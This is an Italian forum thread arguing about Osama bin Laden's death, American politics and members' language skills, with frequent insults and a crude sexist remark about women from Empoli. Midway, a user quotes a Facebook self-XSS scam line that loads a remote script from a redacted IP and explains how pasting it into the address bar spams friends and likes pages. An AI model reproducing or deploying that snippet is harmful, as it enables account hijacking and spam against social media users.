Ma Alkbar e Necker stanno facendo a gara a chi scrive le puttanate più grosse?
Gara bella e tirata tra l'altro, anche se Necker si è un po' spento nelle ultime pagine.
Printable View
Ma Alkbar e Necker stanno facendo a gara a chi scrive le puttanate più grosse?
Gara bella e tirata tra l'altro, anche se Necker si è un po' spento nelle ultime pagine.
quindi chi è il vincitore che posso sfidare vincendo a mani basse? :sneer:
Alka senza offesa io con nello ci ho parlato piu e piu volte e sa un inglese pressoche' ottimo, prima di giudicare qualcuno lo dovresti conoscere, un po come la storia del "EHHH IO VAGGIOO" ma c'e sempre chi viaggia il triplo di te, questa board compresa :sneer:
Un errore capita in italiano figurati in inglese :sneer:
Fa specie che viene a fare l'americano e sbaglia a scrivere in inglese, tutto qua. A Dopo.
ma perchè questo clima teso?
il male è sconfitto, la principessa e il principe sono convolati a giuste nozze, perchè non siete tutti felici e contenti brutti figli di puttana?
Ma infatti il 3d è Osama è morto, dovremmo solo fare festa :confused:
p.s. per nello: motherfuckin' bitches of a son
e questo da dove esce? Da me che diamine vuoi di preciso? il mio pensiero l'ho detto e ripetuto, alka poi ha preso a discutere su altri argomenti dei quali non sto a invischiarmi... se hai qualcosa da dire che sia inerente, dillo invece che provocare a vanvera.
Sembri la copia malriuscita di quell'altro stordito nickcoso.. :sneer:
qualcuno apra un thread sugli israeliani imo :nod:
io raga ieri sono stato a Empoli e, fidatevi di chi le conosce, le empolesi sono tutte troie. Mi dispiace se uno dei voi ha la mamma o la sorella di Empoli, pero' ho l'esperienza per dirlo avendo viaggiato molto nel centro di Empoli ieri.
Detto questo, /thread
mondo secondo alka:
http://www.lowbird.com/data/images/2...pcdn-36112.png
Il discorso era piu' che agli americani il nazionalismo cosi' pressante non piace, come non gli è piaciuta la politica di Bush. E poi anche che ci stanno una marea di americani bigotti e guerrafondai, che non è proprio falso, visto che gli americani stessi lo ammettono.
Invece che parlare di quanto siano degli eroi una popolazione che mette 400 miliardi di euro nell'esercito e di quanto siano orgogliosi di essere americani e quindi i piu' grossi del mondo, magari sentite che dice un americano di quelli che è venuto via da la per vivere in Europa.
O anche solo andare la e vedere come vive una persona normale e scoprire che fare l'operaio in Italia è molto meglio che farlo negli USA.
Molto meno volgare:
http://www.msxnet.org/humour/world-a...to-america.png
Un buon imprintig biologico americano a tutti.
shahaha
tornando una minima seri, vogliamo contare gli europei che vanno in america e gli americani che vengono in europa? :D Poi, europa, europa mica è una nazione venire in europa non vuol dire un cazzo :nod:
Non so se avete visto il link che gira su Facebook, con link esterno a un sito...
Ma come cazzo si fa a cliccare su un link in cui c'è scritto blablabla/strumer.php?<script> ecc Ma dai cazzo -.-
Toi mon caliss t'es un caliss de cave! Tu ne comprends même pas ce dont tu parles...Giusto per rimarcare la mia Quecosita'...
Non voglio andare troppo oltre nella discussione. Voglio solo ricordarti dove abito. Montréal Québec. Parlo per 80% Francese, 19% inglese 1% italiano. Visto che lavoro come consulente per Bombardier.
L'unica cosa che ho notato e' che quando la tua argomentazione fallisce miserabilmente e qualcuno ti chiude la bocca, invcece di "abbozzare" cerchi di trovare l'errore ortografico o grammaticale (tra l'altro in questo caso corretto ancor prima della tua risposta) per spostare l'attenzione su dettagli inutili per mascherare la pochezza e delle tue risposte.
Mi fa piacere che tu abbia messo il mio quote in firma. Ogni qualvolta lo leggero', ridero' al pensiero che hai dovuto editarlo poiche' hai "failato" il reply.
javascript: (a=(b=document).createElement('script')).src='//INDIRIZZO IP/strummer.php?'+Math.random(),b.body.appendChild(a) ;void(0)
Questo è il link, ovviamento ho rimosso l'IP :)
bisogna prenderlo e copiarlo nella barra,la cosa carina è che in primis ti bombarda le persone online su fb nella friend list, in piu ti fa fare mi piace alla loro pagina di FB. Molto interessante
Non ci devi cliccare, perke non funziona, devi copiarlo nella barra degli indirizzi e poi premere enter. Come dire Facebook è anti attacco, ma ti basta fare una pagina di un gruppo con scritto HEY COPIA QUESTA STRINGA che tutta la tua sicurezza va a farsi benedire
hehehe magari :sneer:
http://www.bombardier.com/
Bombardier Transportation&Aerospace
Se è old fotte un cazzo
http://www.youtube.com/watch?v=4hk37...layer_embedded
Piantala con sta storia:
Tu as oublié que j'habit à Valais et que j'etudie la langue française. A force de te masturber tu as perdu ta mémoire. Il y a seulement six mois que j'etudie, ce n'est pas possible pour mois d'éviter de faire des errours.
Per quanto riguarda l'inglese, ho un PhD in UK, insegnavo in inglese e andavo perdendo l'accento italiano che purtroppo è ora tonante in me, visto che vivo in Svizzera e di gente dall'UK non ne sento parlare piu' tanta...
Pero' otto ore al giorno in inglese per lavoro le faccio ancora, insegnamo per qualche strana ragioen in inglese e facciamo tutta la ricerca internazionale in inglese...
Potresti anche darmi credito del fatto che magari me la cavo benino, tanto benino che tanti madrelingua fanno piu' errori di me, dato che non l'hanno studiato e usato quanto me....
Ma niente contro di questo. Comunque guarda che ti stavo trollando, non c'è ragione di farne una tragedia greca, anzi Quebecchiana.Quote:
Non voglio andare troppo oltre nella discussione. Voglio solo ricordarti dove abito. Montréal Québec. Parlo per 80% Francese, 19% inglese 1% italiano. Visto che lavoro come consulente per Bombardier.
La mia argomentazione non è fallita, l'avete mandata in vacca con la solita fanfara all'Italiana.Quote:
L'unica cosa che ho notato e' che quando la tua argomentazione fallisce miserabilmente e qualcuno ti chiude la bocca, invcece di "abbozzare" cerchi di trovare l'errore ortografico o grammaticale (tra l'altro in questo caso corretto ancor prima della tua risposta) per spostare l'attenzione su dettagli inutili per mascherare la pochezza e delle tue risposte.
Si è sviluppata cosi':
Gli americani fanno bene a festeggiare.
Io: No, ce l'hanno messo loro la, oltre tutto hanno una politica imperialista di sto cazzo, se gli si rivolta contro mezzo pianeta per reazione non dovrebbero festeggiare come dei maiali ipocriti.
Hador: hanno una politica migliore della nostra, pagherei per averla qua.
Io: militari, università e cazzi e mazzi.
Hador: visione del mondo di alka.
Alka: visione del mondo di alka.
Al maiali ipocriti vi siete inalberati, tu in particolare perchè ti senti vicino a loro, e poi siamo finiti qua.
Ah di, ogni tanto lavoro anche io, mica posso farci niente se tra il notare il fail e quotare è arrivato il mio capo con 200 documenti da firmare.Quote:
Mi fa piacere che tu abbia messo il mio quote in firma. Ogni qualvolta lo leggero', ridero' al pensiero che hai dovuto editarlo poiche' hai "failato" il reply.
La tolgo comunque, ti stavo solo trollando.
A parte che i mandati totali massimi di un presidente usa sono sicuramente più di 2 (il mio dubbio era tra 3 e 4, qualche ameriggano potrebbe precisare ?).
L'america viene considerata una nazione ma in realtà è composta da una cinquantina di stati, ognuno con caratteristiche diverse, non la vedo così diversa da un'europa con un governo centrale più forte. Per cui invece di generalizzare, alcune parti dell'america mi piacciono, altre di meno, e le differenze tra alcuni stati sono enormi. Quello che so di Nello è che viaggia talmente tanto che non riesce a seguire nemmeno un browser game (cavolo mi avevi invitato su LoU e poi mi hai lasciato crepare :D).
Tornando al discorso, Alkabar non è il caso di fare moralismi, è normale che esultano, è una guerra (diciamo così), l'uccisione del nemico ci sta e ci stanno anche i festeggiamenti. O forse non era giusto festeggiare che ne so, per le varie guerre di liberazione o indipendenza ? Non vedo molta differenza. Per quanto riguarda l'esercito americano, beh a noi come europa fa molto comodo, loro fanno debiti e si occupano di tutte le faccende nel mondo, mentre noi spendiamo quei fondi per lo stato sociale. Per quanto mi riguarda dovrebbero continuare così fino alla bancarotta.
[QUOTE=Alkabar;1745330]La domanda è: se non ci fossero loro ci sarebbero piu' conflitti? QUOTE]
"La vita è un sogno , o i sogni sono fatti per vivere meglio ? "
Ci sono domande che non avranno mai risposta :D
Si, ci sarebbero molti più conflitti. Vedi la storia prima degli USA, un continuo di guerre... ora invece dopo la 2a guerra mondiale ci sono solo piccoli conflitti. A qualcosa servono, anche se col sistema finanziario moderno avere sempre almeno una guerra attiva porta alla bancarotta. Ma anche qui basta consultare la storia, gli USA sono ininterrotamente in guerra dalla fondazione a oggi, vedi http://en.wikipedia.org/wiki/Timelin...ary_operations
Quindi continueranno fino alla bancarotta e oltre. Ma ciò non causa le guerre, più che altro le spegne sul nascere.
Inoltre noi come Europa e come Italia ci ritroveremmo a dover spendere molto di più per la sicurezza (come minimo), se per assurdo supponiamo che gli USA smettano di spendere metà gettito in spese militari per eliminare il deficit.